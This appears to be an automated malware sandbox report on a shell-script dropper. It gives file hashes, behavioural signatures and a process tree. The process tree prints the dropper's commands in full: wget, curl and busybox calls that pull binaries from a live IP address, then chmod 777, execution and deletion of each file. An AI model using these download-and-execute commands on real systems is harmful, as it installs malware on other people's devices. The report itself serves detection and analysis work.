Analysis
- max time kernel: 21s
- max time network: 47s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/11/2024, 05:23
Static task
- static1
Behavioral tasks (all run the same sample, 64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh)
- behavioral1: resource ubuntu1804-amd64-20240729-en
- behavioral2: resource debian9-armhf-20240611-en
- behavioral3: resource debian9-mipsbe-20240418-en
- behavioral4: resource debian9-mipsel-20240611-en
General
- Target: 64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
- Size: 10KB
- MD5: 7d4915a02bbc4a1ae7b70fed6d3293c1
- SHA1: b164b6db9f2e8375942f65d81fdbee4d41650560
- SHA256: 64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926
- SHA512: 6830a2ff2527d337e1e6b83939662fb92e363729989c13b85ad949521942da0b5acfade63e558e549f074167b1367ba6ae1d980f9217d63cc670c0d53ed0ce28
- SSDEEP: 192:jrE/uXvn65QyKeioEWfPDt92igPn12igPnA/WXvn65QjeiojPDv:jrE2Xvn6uymWp92igPn12igPnAeXvn61
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 6 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process: 744 chmod; 766 chmod; 772 chmod; 778 chmod; 784 chmod; 790 chmod
- Executes dropped EXE (6 IoCs)
  ioc / pid / Process:
  /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM / 745 / uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
  /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE / 767 / Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
  /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ / 773 / eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
  /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik / 779 / 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
  /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq / 785 / WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
  /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN / 791 / bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
- Checks CPU configuration (1 TTP, 6 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  description / ioc / Process:
  File opened for reading / /proc/cpuinfo / curl (6 entries, one per curl process)
- Reads runtime system information (12 IoCs)
  description / ioc / Process:
  File opened for reading / /proc/self/auxv / curl (6 entries, one per curl process)
  File opened for reading / /proc/sys/crypto/fips_enabled / curl (6 entries, one per curl process)
- Writes file to tmp directory (6 IoCs)
  Malware often drops required files in the /tmp directory.
  description / ioc / Process:
  File opened for modification / /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM / curl
  File opened for modification / /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE / curl
  File opened for modification / /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ / curl
  File opened for modification / /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik / curl
  File opened for modification / /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq / curl
  File opened for modification / /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN / curl
Processes
Each entry: PID | image path | command line | signatures (if any). Indented entries are child processes of PID 650.
- PID 650 | /tmp/64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh | /tmp/64de2e23c0977b9b1adb01d6f576ff8a240c8739f87d4cc23bb2e58d9a636926.sh
  - PID 652 | /bin/rm | /bin/rm bins.sh
  - PID 658 | /usr/bin/wget | wget http://216.126.231.240/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
  - PID 673 | /usr/bin/curl | curl -O http://216.126.231.240/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 681 | /bin/busybox | /bin/busybox wget http://216.126.231.240/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
  - PID 744 | /bin/chmod | chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | File and Directory Permissions Modification
  - PID 745 | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | ./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | Executes dropped EXE
  - PID 746 | /bin/rm | rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
  - PID 747 | /usr/bin/wget | wget http://216.126.231.240/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
  - PID 756 | /usr/bin/curl | curl -O http://216.126.231.240/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 763 | /bin/busybox | /bin/busybox wget http://216.126.231.240/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
  - PID 766 | /bin/chmod | chmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | File and Directory Permissions Modification
  - PID 767 | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | ./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | Executes dropped EXE
  - PID 768 | /bin/rm | rm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
  - PID 769 | /usr/bin/wget | wget http://216.126.231.240/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
  - PID 770 | /usr/bin/curl | curl -O http://216.126.231.240/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 771 | /bin/busybox | /bin/busybox wget http://216.126.231.240/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
  - PID 772 | /bin/chmod | chmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | File and Directory Permissions Modification
  - PID 773 | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | ./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | Executes dropped EXE
  - PID 774 | /bin/rm | rm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
  - PID 775 | /usr/bin/wget | wget http://216.126.231.240/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
  - PID 776 | /usr/bin/curl | curl -O http://216.126.231.240/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 777 | /bin/busybox | /bin/busybox wget http://216.126.231.240/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
  - PID 778 | /bin/chmod | chmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | File and Directory Permissions Modification
  - PID 779 | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | ./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | Executes dropped EXE
  - PID 780 | /bin/rm | rm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
  - PID 781 | /usr/bin/wget | wget http://216.126.231.240/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
  - PID 782 | /usr/bin/curl | curl -O http://216.126.231.240/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 783 | /bin/busybox | /bin/busybox wget http://216.126.231.240/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
  - PID 784 | /bin/chmod | chmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | File and Directory Permissions Modification
  - PID 785 | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | ./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | Executes dropped EXE
  - PID 786 | /bin/rm | rm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
  - PID 787 | /usr/bin/wget | wget http://216.126.231.240/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
  - PID 788 | /usr/bin/curl | curl -O http://216.126.231.240/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - PID 789 | /bin/busybox | /bin/busybox wget http://216.126.231.240/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
  - PID 790 | /bin/chmod | chmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | File and Directory Permissions Modification
  - PID 791 | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | ./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | Executes dropped EXE
  - PID 792 | /bin/rm | rm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
  - PID 793 | /usr/bin/wget | wget http://216.126.231.240/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc
  - PID 794 | /usr/bin/curl | curl -O http://216.126.231.240/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97